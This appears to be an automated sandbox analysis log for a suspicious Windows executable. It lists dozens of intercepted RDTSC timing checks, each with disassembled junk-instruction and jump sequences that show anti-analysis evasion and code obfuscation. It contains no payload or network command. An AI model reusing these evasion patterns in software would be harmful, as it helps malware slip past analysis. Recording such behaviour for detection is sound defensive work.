Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D3DDF second address: 3D3E1B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3A94CD408Eh 0x00000008 jmp 00007F3A94CD4085h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D405E second address: 3D4078 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3A9502B5F0h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3D4078 second address: 3D407C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DB0AE second address: 3DB0C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 jmp 00007F3A9502B5ECh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DB785 second address: 3DB78F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DBD01 second address: 3DBD07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DC00A second address: 3DC018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 ja 00007F3A94CD4076h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DC2F2 second address: 3DC308 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A9502B5F2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DC5F8 second address: 3DC616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3A94CD4089h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DCC0B second address: 3DCC0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DCC0F second address: 3DCC17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3DCC17 second address: 3DCC2B instructions: 0x00000000 rdtsc 0x00000002 js 00007F3A9502B5EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a jns 00007F3A9502B5E6h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E01B2 second address: 3E01DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jg 00007F3A94CD407Ch 0x0000000d jne 00007F3A94CD4076h 0x00000013 jnc 00007F3A94CD4078h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jng 00007F3A94CD4076h 0x00000024 jns 00007F3A94CD4076h 0x0000002a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E01DE second address: 3E01F8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F3A9502B5F0h 0x0000000e pop edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E04BF second address: 3E04C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E04C5 second address: 3E04EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F3A9502B5E6h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jne 00007F3A9502B5F3h 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 jng 00007F3A9502B5E6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E04EF second address: 3E0503 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007F3A94CD4076h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E07A3 second address: 3E07A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E07A7 second address: 3E07C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007F3A94CD4080h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E08F2 second address: 3E0912 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3A9502B5EEh 0x00000011 jno 00007F3A9502B5E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E0912 second address: 3E0935 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3A94CD4076h 0x00000008 jmp 00007F3A94CD4083h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E0935 second address: 3E093E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3E0A7D second address: 3E0A85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ED888 second address: 3ED892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBB83 second address: 3EBB87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBB87 second address: 3EBB8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBB8D second address: 3EBB9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F3A94CD407Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBE41 second address: 3EBE47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBE47 second address: 3EBE61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3A94CD4085h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EBE61 second address: 3EBE66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC15C second address: 3EC178 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4080h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC178 second address: 3EC17C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC17C second address: 3EC180 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC4A7 second address: 3EC4B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC4B1 second address: 3EC4B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC4B5 second address: 3EC4B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC607 second address: 3EC615 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A94CD4076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3EC615 second address: 3EC619 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 332D00 second address: 332D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3A94CD4076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 332D0A second address: 332D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ECF25 second address: 3ECF2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ECF2B second address: 3ECF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ECF32 second address: 3ECF4A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4083h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ECF4A second address: 3ECF54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3ED6FF second address: 3ED70A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3F62C9 second address: 3F62DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F3A9502B5E6h 0x0000000c jnl 00007F3A9502B5E6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3F62DC second address: 3F6308 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3A94CD407Ch 0x00000008 push edx 0x00000009 jo 00007F3A94CD4076h 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push edx 0x00000015 jmp 00007F3A94CD407Eh 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3F5E7A second address: 3F5E86 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3A9502B5EEh 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 402085 second address: 402089 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 402089 second address: 4020A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3A9502B5EAh 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F3A9502B5E6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4020A4 second address: 4020A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C0F second address: 401C15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C15 second address: 401C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C19 second address: 401C1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C1D second address: 401C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C23 second address: 401C55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F3A9502B5F9h 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3A9502B5EFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401C55 second address: 401C5B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401DC5 second address: 401DCB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 401DCB second address: 401DCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 40430F second address: 404323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 404323 second address: 404329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 408069 second address: 40806F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4081D4 second address: 4081D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4081D8 second address: 4081ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007F3A9502B5E8h 0x0000000e pushad 0x0000000f popad 0x00000010 push ebx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0701 second address: 4BB070D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB070D second address: 4BB073B instructions: 0x00000000 rdtsc 0x00000002 mov si, BF37h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov cl, 17h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov bl, 40h 0x00000010 jmp 00007F3A94CD407Eh 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ebx, 3AD1E570h 0x0000001f mov ebx, 5FC7E89Ch 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB073B second address: 4BB0741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0741 second address: 4BB0763 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A94CD4085h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0763 second address: 4BB0778 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0778 second address: 4BB077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB077E second address: 4BB07CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 pushad 0x0000000a mov ebx, 7F686748h 0x0000000f jmp 00007F3A9502B5F1h 0x00000014 popad 0x00000015 mov eax, dword ptr [774365FCh] 0x0000001a jmp 00007F3A9502B5EEh 0x0000001f test eax, eax 0x00000021 pushad 0x00000022 mov si, C3FDh 0x00000026 mov ebx, ecx 0x00000028 popad 0x00000029 je 00007F3B0782E790h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3A9502B5EBh 0x00000036 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB07CF second address: 4BB0833 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3A94CD407Fh 0x00000009 xor ch, FFFFFF9Eh 0x0000000c jmp 00007F3A94CD4089h 0x00000011 popfd 0x00000012 call 00007F3A94CD4080h 0x00000017 pop esi 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ecx, eax 0x0000001d pushad 0x0000001e mov di, 6162h 0x00000022 mov ecx, edi 0x00000024 popad 0x00000025 xor eax, dword ptr [ebp+08h] 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F3A94CD4081h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0833 second address: 4BB087D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3A9502B5F7h 0x00000009 adc esi, 0C4867BEh 0x0000000f jmp 00007F3A9502B5F9h 0x00000014 popfd 0x00000015 mov ax, 3107h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c and ecx, 1Fh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB087D second address: 4BB0881 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0881 second address: 4BB08D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ch, 2Eh 0x00000008 popad 0x00000009 ror eax, cl 0x0000000b jmp 00007F3A9502B5EDh 0x00000010 leave 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F3A9502B5ECh 0x00000018 and ax, 5B18h 0x0000001d jmp 00007F3A9502B5EBh 0x00000022 popfd 0x00000023 call 00007F3A9502B5F8h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0957 second address: 4BB0973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A94CD4081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0973 second address: 4BB0977 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB0977 second address: 4BB097D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB097D second address: 4BB09B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 4227h 0x00000007 mov ebx, esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jmp 00007F3A9502B5F9h 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov di, 081Eh 0x0000001a mov dx, 882Ah 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4BB09B0 second address: 4BB09CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3A94CD4087h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60016 second address: 4B6001C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B6001C second address: 4B60084 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov cx, bx 0x0000000d mov cx, bx 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 mov dl, C2h 0x00000015 pushfd 0x00000016 jmp 00007F3A94CD407Eh 0x0000001b add al, 00000028h 0x0000001e jmp 00007F3A94CD407Bh 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F3A94CD4086h 0x0000002c and esp, FFFFFFF8h 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3A94CD4087h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B60084 second address: 4B600F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3A9502B5F3h 0x00000013 adc ch, FFFFFFDEh 0x00000016 jmp 00007F3A9502B5F9h 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F3A9502B5F0h 0x00000022 xor ah, FFFFFFD8h 0x00000025 jmp 00007F3A9502B5EBh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B600F7 second address: 4B600FD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 4B600FD second address: 4B60101 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
